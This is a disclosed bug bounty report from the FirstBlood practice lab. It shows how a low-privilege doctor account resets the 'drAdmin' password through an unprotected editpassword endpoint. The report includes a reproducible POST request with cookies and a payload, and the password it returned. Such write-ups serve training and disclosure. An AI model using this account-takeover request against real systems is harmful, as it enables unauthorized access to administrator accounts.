FirstBlood-#662 — It is possible to reset drAdmin's password
This issue was discovered on FirstBlood v2
On 2021-10-27, vigilante Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary:
The admin user "drAdmin" is already configured but we don't have the password for it. We can register as a standard user and reset "drAdmin's" password.
When logged in as a normal user, we can see a snippet of code that indicates there's a password reset functionality.
/drpanel/index.php
/* to do
function editpassword(username) {
var xhr = new XMLHttpRequest();
xhr.open("POST", '', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
alert(this.responseText);
} else {
}
}
xhr.send();
} */
To reset the "drAdmin's" password we just need to send a POST request and guess the name of the right endpoint.
Steps to Reproduce:
- Register a new Doctors account by using "test" as the unique invite code.
This is covered in my previous report id=377.
- Navigate to https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/drpanel/index.php and see the snippet of code mentioned earlier.
- Open the previous GET request, send it to BURP repeater and modify the following. We're doing this to have auth cookies included in the request.
- Change request method. This will change GET to POST.
- Modify the endpoint to /drpanel/drapi/editpassword.php
- add payload, "username=dradmin&password=dradmin"
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: d8a1eeb46146-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a8100fb5e4101c701b23b66ca
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/login.php?action=login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
username=dradmin&password=dradmin
- We've recevied a new password for "drAdmin's" account and verified that we can log in.
Password updated - RLMzAqTlm8BUG2v
Screenshots:
Impact
A new doctor's account with limited functionality is able to reset true admin's account password.
P1 CRITICAL
Endpoint: drpanel/drapi/editpassword.php
This report contains multiple vulnerabilities:
FirstBlood ID: 24
Vulnerability Type: Auth issues
The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.